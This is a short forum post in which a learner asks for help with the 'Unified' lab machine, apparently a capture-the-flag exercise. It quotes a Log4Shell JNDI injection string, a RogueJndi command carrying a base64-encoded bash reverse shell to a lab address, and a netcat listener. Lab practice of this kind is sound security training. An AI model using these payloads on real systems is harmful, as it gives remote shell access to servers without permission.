Hello. I am on my third attempt through the Unified machine, and netcat is refusing a rogue connection. I opened the jar file and attempted to intercept the connection to Unifi through Burp, but so far, nothing has shown up in netcat.
java -jar target/RogueJndi-1.1.jar --command “bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjEzLzQ0NDQgMD4mMQo=}|
{base64,-d}|{bash,-i}” --hostname “10.10.14.213”
I sent this payload through Burp Repeater “${jndi:ldap://10.10.14.213:1389/o=tomcat}” and received a response on my Rogue server, but so far, I have received nothing on netcat. I am attempting to intercept on port 4444 as the walkthrough recommended. (nc -lnvp 4444)
I did things exactly as they should have been done in the walkthrough, and have also watched some videos on the subject, but so far, I have had no luck.
Thanks.